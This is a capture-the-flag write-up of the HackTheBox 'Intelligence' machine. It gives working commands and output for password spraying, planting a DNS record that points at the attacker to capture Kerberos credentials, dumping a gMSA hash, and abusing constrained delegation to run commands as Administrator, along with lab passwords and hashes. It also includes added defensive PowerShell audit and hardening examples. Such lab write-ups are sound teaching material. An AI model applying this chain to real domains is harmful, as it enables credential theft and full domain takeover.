
HackTheBox: Intelligence


User

At first let’s check what ports are available:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 02:22:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
56490/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-04T02:23:30
|_  start_date: N/A

It looks like an Active Directory domain controller, but before anything else let’s check the website:

Web interface

There are links to two PDFs (/documents/2020-01-01-upload.pdf and http://intelligence.htb/documents/2020-12-15-upload.pdf).

They don’t contain anything useful, just lorem ipsum text. What looks suspicious is the filename format, “date-upload.pdf”, so I used Burp Intruder to check for more valid PDFs; this is the payload:

Intruder

After Intruder finished, I filtered out the non-200 responses and saved the result table (payload column only) to a file, so I could use it as a wordlist to download all the PDFs:

for i in $(cat wordlists); do wget "http://intelligence.htb:8000/$i-upload.pdf"; done

There are two PDFs without lorem ipsum text in them:

New Account Guide (/documents/2020-06-04-upload.pdf):

New Account Guide

Internal IT Update (/documents/2020-12-30-upload.pdf):

Internal IT Update

We have a password but no usernames yet, so we get the users from the PDF metadata (the Creator field):

exiftool pdfs/* | grep Creator | awk '{ print $3}' | sort -u

Finally we can find out which user the password belongs to by password spraying with kerbrute:

kerbrute passwordspray --dc dc.intelligence.htb -d intelligence.htb authors.txt NewIntelligenceCorpUser9876

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 07/05/21 - Ronnie Flathers @ropnop

2021/07/05 07:47:26 >  Using KDC(s):
2021/07/05 07:47:26 >   dc.intelligence.htb:88

2021/07/05 07:47:26 >  [+] VALID LOGIN:  Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876
2021/07/05 07:47:26 >  Done! Tested 30 logins (1 successes) in 0.426 seconds

At this point we can test multiple services with this password:

  • SMB
  • WinRM
  • LDAP

SMB worked just fine and the user flag is in the Users share; we can grab it with the following command:

smbclient -E -U Tiffany.Molina%NewIntelligenceCorpUser9876  //10.10.10.248/Users -c 'get \\Tiffany.Molina\\Desktop\\user.txt /dev/fd/1' 2>/dev/null | cat

Root

Additionally, there is the following file in the IT share on SMB:

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {   # as published this read ".StatusCode", a typo that throws inside the try block
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

So the script runs as Ted.Graves every five minutes, requests every DNS record in the zone whose name starts with “web”, and sends his credentials along with the request. If we manage to inject such a subdomain into intelligence.htb and point it to ourselves, we can get the credentials of Ted.Graves.
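
As an added example (not the file from the IT share), here is a hardened rewrite of that task followed by an ACL check on the zone; the allowlisted hostnames and the SMTP server are constructed placeholders:

```powershell
# Added example, not the file from the IT share: a hardened rewrite of the
# "check web server status" task. Two changes remove the credential-leak path:
#  1. hosts come from a fixed allowlist instead of every "web*" record in
#     ADIDNS, where authenticated users can create records by default;
#  2. no -UseDefaultCredentials, so the task never offers the scheduled-task
#     account's credentials to whatever host answers the request.
# The hostnames and SMTP server below are constructed placeholders.
$Allowed    = @('webmail.intelligence.htb', 'webportal.intelligence.htb')
$SmtpServer = 'mail.intelligence.htb'

foreach ($hostName in $Allowed) {
    try {
        # HEAD is enough for a liveness check; the timeout keeps the task bounded
        $response = Invoke-WebRequest -Uri "http://$hostName/" -Method Head -UseBasicParsing -TimeoutSec 10
        $status = [int]$response.StatusCode
    } catch {
        # Invoke-WebRequest throws on 4xx/5xx and on connection failures; record both as down
        $status = if ($_.Exception.Response) { [int]$_.Exception.Response.StatusCode } else { 0 }
    }
    if ($status -ne 200) {
        Send-MailMessage -SmtpServer $SmtpServer `
            -From 'Ted Graves <Ted.Graves@intelligence.htb>' `
            -To   'Ted Graves <Ted.Graves@intelligence.htb>' `
            -Subject "Host: $hostName is down (status $status)"
    }
}

# Audit: which principals are allowed to create child objects (i.e. DNS records)
# directly in the zone the original script iterated over?
Import-Module ActiveDirectory
$zone = 'AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb'
$createChild = [System.DirectoryServices.ActiveDirectoryRights]::CreateChild
(Get-Acl -Path $zone).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and (($_.ActiveDirectoryRights -band $createChild) -ne 0) } |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited
```

If the audit lists Authenticated Users with CreateChild, any domain account can add the kind of record the next step creates, so the zone ACL is the thing to tighten alongside the script.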

To edit it I found this command, dnscmd. However we aren’t allowed to get a shell through EvilWinRM. After some time investigating and a nudge I found this post, and they mention a tool that, among other functionalities, allows us to create DNS records using LDAP:

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r websample.intelligence.htb -d 10.10.15.193 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/jusepe/Documents/HackTheBox/Machines/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

At this point I made an attempt to get the credentials with netcat:

nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.248] 64132
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1852
Host: websample
Connection: Keep-Alive

For some reason it didn’t catch the Kerberos credentials, so I tried with Responder:

Responder

I cracked the password with hashcat and rockyou:

Hashcat

Now, from the previous PDF we know that service accounts are active, so I checked whether that was exploitable and found these two resources on how to attack Kerberos constrained delegation:

As the posts explain, “Attribute msds-allowedtodelegateto identifies the SPNs of services the user spot is trusted to delegate to”. So I used LDAP to enumerate which accounts have delegation configured and which SPNs they may delegate to:

ldapsearch -h 10.10.10.248 -b "dc=intelligence,dc=htb" -D "Ted.Graves@intelligence.htb" -w "Mr.Teddy" | grep msDS-AllowedToDelegateTo
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb

Now we get the NT hash of the gMSA using gMSADumper:

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy  -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
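
The defender’s view of the two enumeration steps above (delegation targets via LDAP, gMSA password readers via gMSADumper), as an added example that is not part of the page’s tooling; it assumes an administrative domain-joined session with the ActiveDirectory module:

```powershell
# Added example, not part of the page's tooling: the defender's view of the two
# enumeration steps above, run from an administrative domain-joined session.
Import-Module ActiveDirectory

# 1. Accounts with constrained delegation (msDS-AllowedToDelegateTo set) and whether
#    they also have TRUSTED_TO_AUTH_FOR_DELEGATION (userAccountControl bit 0x1000000).
#    That bit enables protocol transition: the account can obtain service tickets
#    for any user to the listed SPNs without that user ever authenticating.
function Get-ConstrainedDelegationReport {
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
                 -Properties msDS-AllowedToDelegateTo, userAccountControl |
    ForEach-Object {
        [pscustomobject]@{
            Account            = $_.Name
            DelegatesTo        = ($_.'msDS-AllowedToDelegateTo' -join ', ')
            ProtocolTransition = (($_.userAccountControl -band 0x1000000) -ne 0)
        }
    }
}

# 2. Group managed service accounts and the principals allowed to retrieve their
#    password blob, which is what gMSADumper reads when run as one of those principals.
function Get-GmsaPasswordReaders {
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
    ForEach-Object {
        [pscustomobject]@{
            Account = $_.SamAccountName
            Readers = ($_.PrincipalsAllowedToRetrieveManagedPassword -join ', ')
        }
    }
}

Get-ConstrainedDelegationReport | Format-Table -AutoSize
Get-GmsaPasswordReaders         | Format-Table -AutoSize
```

Any gMSA whose Readers column names a broad group rather than the specific host or service that needs it, combined with a ProtocolTransition of True, is the configuration the rest of this section abuses.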

That hash can be used to request a Kerberos service ticket for the SPN while impersonating Administrator:

impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great

Before continuing we need to sync our clock with the DC (the KDC rejects requests with too much clock skew):

sudo net time set -S intelligence.htb

We export the ticket:

export KRB5CCNAME=Administrator.ccache

Finally we can execute commands as Administrator using the Kerberos ticket:

impacket-atexec -k -no-pass dc.intelligence.htb 'whoami && ipconfig' 
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \tfiHspSg
[*] Running task \tfiHspSg
[*] Deleting task \tfiHspSg
[*] Attempting to read ADMIN$\Temp\tfiHspSg.tmp

Windows IP Configuration


Ethernet adapter Ethernet0 2:

Connection-specific DNS Suffix  . : 
IPv6 Address. . . . . . . . . . . : dead:beef::9473:360f:c80a:40d3
Link-local IPv6 Address . . . . . : fe80::9473:360f:c80a:40d3%6
IPv4 Address. . . . . . . . . . . : 10.10.10.248
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:30b0%6
10.10.10.2
WRITTEN BY
ITasahobby
InTernet lover